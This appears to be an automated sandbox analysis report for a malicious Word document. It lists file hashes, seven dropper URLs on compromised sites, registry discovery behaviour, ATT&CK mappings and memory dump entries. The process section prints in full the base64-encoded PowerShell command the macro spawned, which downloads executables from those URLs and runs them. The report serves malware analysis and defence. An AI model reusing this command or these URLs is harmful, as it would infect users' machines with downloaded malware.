0d02c98ad01532b5e4cfc139dc7abaf912d4f58a90576f99b9e46ae6638bc5ee

General

Target

264223b8b2bd297573b518e730a7dc16_JaffaCakes118.doc
Size

152KB
MD5

264223b8b2bd297573b518e730a7dc16
SHA1

3d308ddd20db62392ed5fe50637ca99bc8f5f1ad
SHA256

0d02c98ad01532b5e4cfc139dc7abaf912d4f58a90576f99b9e46ae6638bc5ee
SHA512

6be91ab6f312a60403988ad608d6b6768a379695f8f73384e8bf1e2b267e962227d0c2d85722b8dd8229b0665c3a8a8424d696380a9815bda2920c6e92e6436f
SSDEEP

1536:sgtIgPgtIgxrdi1Ir77zOH98Wj2gpngR+a9KrqYzE4gLLPxzwN:irfrzOH98ipgoqYzE42xzwN

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://www.gozowindmill.com/meteo/97/

exe.dropper

http://www.greaudstudio.com/docs/Z/

exe.dropper

https://b176f.cn/wp-admin/1/

exe.dropper

https://blog.socialpill.in/jdzetd/fZuInax/

exe.dropper

http://maisshake.com.br/wp-includes/dPmzV1/

exe.dropper

http://mesdelicesitaliens.fr/wp-admin/tSlCBpP/

exe.dropper

http://grndl.com/oinj/j4/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3112	4748	powershell.exe	82

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	3112	powershell.exe
69	3112	powershell.exe
80	3112	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4780	WINWORD.EXE
4780	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3112	powershell.exe
3112	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3112	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4780	WINWORD.EXE
4780	WINWORD.EXE
4780	WINWORD.EXE
4780	WINWORD.EXE
4780	WINWORD.EXE
4780	WINWORD.EXE
4780	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\264223b8b2bd297573b518e730a7dc16_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABSADMAbABmAF8AZgAyAD0AKAAoACcASgA5ADEAeAB5ACcAKwAnAGwAJwApACsAJwA0ACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBzAEUAcgBwAHIATwBGAEkAbABlAFwARgAwAEIAdwBlADUANABcAGQARwB3AGwAcgBZADQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIAZQBDAHQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAcgBpAGAAVAB5AHAAcgBgAE8AYABUAE8AYABjAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwApACsAKAAnADIALAAgAHQAbAAnACsAJwBzACcAKwAnADEAMQAnACkAKwAnACwAJwArACgAJwAgAHQAJwArACcAbAAnACkAKwAnAHMAJwApADsAJABBADYANgBqADYAdgB1ACAAPQAgACgAJwBVAGoAJwArACcAawBmACcAKwAoACcAbQBrACcAKwAnAGcAYwAnACkAKQA7ACQAVABxAGQAeQA5ADkAbQA9ACgAKAAnAFoAdwAnACsAJwBjAGsAcAAnACkAKwAnADUAJwArACcAYgAnACkAOwAkAFcAbgBpAHUAawBrAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwA0ACcAKwAnAHgAUAAnACkAKwAoACcARgAwACcAKwAnAGIAdwAnACkAKwAoACcAZQAnACsAJwA1ADQAJwArACcANAB4AFAARABnAHcAJwApACsAKAAnAGwAcgB5ADQAJwArACcANAAnACkAKwAnAHgAUAAnACkALgAiAHIARQBwAEwAQQBgAEMARQAiACgAKABbAGMAaABhAFIAXQA1ADIAKwBbAGMAaABhAFIAXQAxADIAMAArAFsAYwBoAGEAUgBdADgAMAApACwAJwBcACcAKQApACsAJABBADYANgBqADYAdgB1ACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAQwBqAGgAZQBnADQANQA9ACgAJwBaAHQAJwArACcAaAAnACsAKAAnAG4AeQAnACsAJwB0AG8AJwApACkAOwAkAEcAdQBjAGgAcwBoADEAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAE4ARQB0AC4AdwBFAGIAQwBMAGkARQBuAHQAOwAkAEYAdwBsADEAcwBzAHYAPQAoACcAaAAnACsAKAAnAHQAdABwADoALwAvAHcAJwArACcAdwB3AC4AJwArACcAZwBvAHoAbwAnACsAJwB3ACcAKQArACgAJwBpACcAKwAnAG4AZABtACcAKwAnAGkAbAAnACkAKwAoACcAbAAnACsAJwAuAGMAbwAnACkAKwAoACcAbQAnACsAJwAvAG0AZQB0AGUAbwAvACcAKwAnADkANwAnACkAKwAoACcALwAnACsAJwAqAGgAdAAnACsAJwB0AHAAOgAvACcAKwAnAC8AdwB3AHcAJwApACsAJwAuAGcAJwArACgAJwByAGUAJwArACcAYQAnACkAKwAnAHUAJwArACgAJwBkAHMAdAB1AGQAJwArACcAaQBvAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AZAAnACkAKwAoACcAbwAnACsAJwBjAHMALwBaACcAKwAnAC8AKgBoAHQAdABwAHMAJwApACsAJwA6ACcAKwAoACcALwAvAGIAJwArACcAMQA3ACcAKwAnADYAZgAuACcAKwAnAGMAJwApACsAJwBuACcAKwAoACcALwB3AHAAJwArACcALQAnACkAKwAoACcAYQAnACsAJwBkAG0AaQBuACcAKQArACgAJwAvADEALwAqAGgAJwArACcAdAB0AHAAJwArACcAcwA6AC8AJwApACsAJwAvAGIAJwArACgAJwBsAG8AJwArACcAZwAnACkAKwAoACcALgAnACsAJwBzAG8AJwApACsAJwBjAGkAJwArACgAJwBhAGwAJwArACcAcABpACcAKQArACgAJwBsAGwALgBpAG4ALwBqAGQAJwArACcAegAnACsAJwBlAHQAJwArACcAZAAvACcAKQArACcAZgBaACcAKwAnAHUAJwArACgAJwBJAG4AYQB4ACcAKwAnAC8AJwApACsAJwAqAGgAJwArACcAdAAnACsAKAAnAHQAcAAnACsAJwA6ACcAKQArACcALwAvACcAKwAoACcAbQBhACcAKwAnAGkAcwAnACkAKwAnAHMAJwArACcAaAAnACsAKAAnAGEAJwArACcAawBlACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC4AJwArACcAYgAnACsAJwByAC8AJwArACcAdwBwAC0AaQBuAGMAbAB1AGQAJwApACsAJwBlACcAKwAoACcAcwAvAGQAUAAnACsAJwBtACcAKQArACcAegBWACcAKwAnADEALwAnACsAJwAqACcAKwAnAGgAdAAnACsAJwB0AHAAJwArACgAJwA6AC8ALwBtACcAKwAnAGUAJwArACcAcwBkACcAKQArACcAZQBsACcAKwAoACcAaQAnACsAJwBjAGUAJwApACsAKAAnAHMAaQB0AGEAJwArACcAbAAnACkAKwAoACcAaQBlAG4AJwArACcAcwAnACkAKwAoACcALgBmAHIAJwArACcALwB3ACcAKQArACcAcAAnACsAKAAnAC0AYQAnACsAJwBkACcAKQArACgAJwBtACcAKwAnAGkAbgAnACkAKwAnAC8AdAAnACsAKAAnAFMAbAAnACsAJwBDAEIAcABQAC8AJwApACsAKAAnACoAJwArACcAaAB0AHQAcAA6AC8ALwAnACkAKwAoACcAZwByACcAKwAnAG4AZABsAC4AYwBvACcAKwAnAG0ALwBvACcAKQArACgAJwBpACcAKwAnAG4AagAvAGoAJwArACcANAAvACcAKQApAC4AIgBTAGAAcABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAdgBpADEAeABrAHAAPQAoACcASgAnACsAJwB2AHoAJwArACgAJwAxADEAbgAnACsAJwBuACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQARgBtAGQAcwBlAG8ANwAgAGkAbgAgACQARgB3AGwAMQBzAHMAdgApAHsAdAByAHkAewAkAEcAdQBjAGgAcwBoADEALgAiAEQATwB3AG4AbABgAE8AYQBEAEYAYABJAGwAZQAiACgAJABGAG0AZABzAGUAbwA3ACwAIAAkAFcAbgBpAHUAawBrAGoAKQA7ACQARwA5AGkAYgAwADkAbwA9ACgAKAAnAFEAJwArACcAMQB6ACcAKQArACgAJwBwACcAKwAnADEAXwBwACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFcAbgBpAHUAawBrAGoAKQAuACIATABlAGAATgBHAGAAVABoACIAIAAtAGcAZQAgADIAOAA5ADEANQApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABXAG4AaQB1AGsAawBqACkAOwAkAEwAYQA2AHcAbAB2ADYAPQAoACgAJwBGADMAJwArACcAdwBkAGQAJwApACsAJwB5AHcAJwApADsAYgByAGUAYQBrADsAJABUAGUAMQBrAG0AeABtAD0AKAAoACcARwBkADkAdgAnACsAJwBhACcAKQArACcAawAnACsAJwBvACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwBzAGsAbQBzADUAOQA9ACgAKAAnAEsAaAAzACcAKwAnAGcAJwApACsAJwA0ADgAJwArACcAdAAnACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDA907.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2gkax5ez.iuw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3112-70-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/3112-564-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/3112-71-0x00000221FFF80000-0x00000221FFFA2000-memory.dmp

Filesize
136KB

Download
memory/4780-8-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-32-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-7-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-9-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-0-0x00007FFF76650000-0x00007FFF76660000-memory.dmp

Filesize
64KB

Download
memory/4780-10-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-11-0x00007FFF744E0000-0x00007FFF744F0000-memory.dmp

Filesize
64KB

Download
memory/4780-12-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-13-0x00007FFF744E0000-0x00007FFF744F0000-memory.dmp

Filesize
64KB

Download
memory/4780-15-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-14-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-18-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-20-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-19-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-17-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-16-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-31-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-5-0x00007FFFB666D000-0x00007FFFB666E000-memory.dmp

Filesize
4KB

Download
memory/4780-69-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-6-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-1-0x00007FFF76650000-0x00007FFF76660000-memory.dmp

Filesize
64KB

Download
memory/4780-2-0x00007FFF76650000-0x00007FFF76660000-memory.dmp

Filesize
64KB

Download
memory/4780-4-0x00007FFF76650000-0x00007FFF76660000-memory.dmp

Filesize
64KB

Download
memory/4780-461-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-561-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-562-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-563-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download
memory/4780-3-0x00007FFF76650000-0x00007FFF76660000-memory.dmp

Filesize
64KB

Download
memory/4780-583-0x00007FFF76650000-0x00007FFF76660000-memory.dmp

Filesize
64KB

Download
memory/4780-584-0x00007FFF76650000-0x00007FFF76660000-memory.dmp

Filesize
64KB

Download
memory/4780-586-0x00007FFF76650000-0x00007FFF76660000-memory.dmp

Filesize
64KB

Download
memory/4780-585-0x00007FFF76650000-0x00007FFF76660000-memory.dmp

Filesize
64KB

Download
memory/4780-587-0x00007FFFB65D0000-0x00007FFFB67C5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads